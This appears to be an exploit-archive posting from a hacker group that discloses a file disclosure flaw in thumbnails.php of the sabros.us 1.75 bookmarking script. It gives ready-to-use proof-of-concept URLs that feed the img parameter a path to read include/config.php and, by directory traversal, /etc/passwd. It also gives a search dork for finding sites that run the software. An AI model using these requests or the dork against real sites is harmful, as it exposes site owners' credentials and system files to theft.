id: 2809
date: 04/03/2008
title: sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability
author: HaCkeR_EgY
cves: 

====================================================================
sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability
====================================================================




     #######################################################
                   <<<<<< Remote File Disclosure Vulnerability >>>>>>
                               sabrosus 1.75  (thumbnails.php)
           #######################################################
 
## AUTHOR :  HaCkeR_EgY
 
###############################################################################
## Download Script : http://sourceforge.net/project/downloading.php?groupname=sabrosus&filename=sabrosus1-75.zip&use_mirror=garr

## vurn C0de :
     in (thumbnails.php) 
        line 82
                       readfile ($img) <===
 
## Dork : Powered by sabros.us
 
## PoC:  http://localhost/sabrosus/thumbnails.php?img=include/config.php
             http://localhost/sabrosus/thumbnails.php?img=../../../../../../../../etc/passwd
                                            
#################################################################################
 
## GREETZ TO :   My BrOther and My MasTer   " Abo Mohamed "

##  Thanx     :  FiReSell  , MoHamed EL Arab  ,  Mr.exe  ,  zaradusht  ,  M$s D@nG3rS ,and all " pal-hacker members "
 
#####################################################################################



#  0day.today [2023-03-27]  #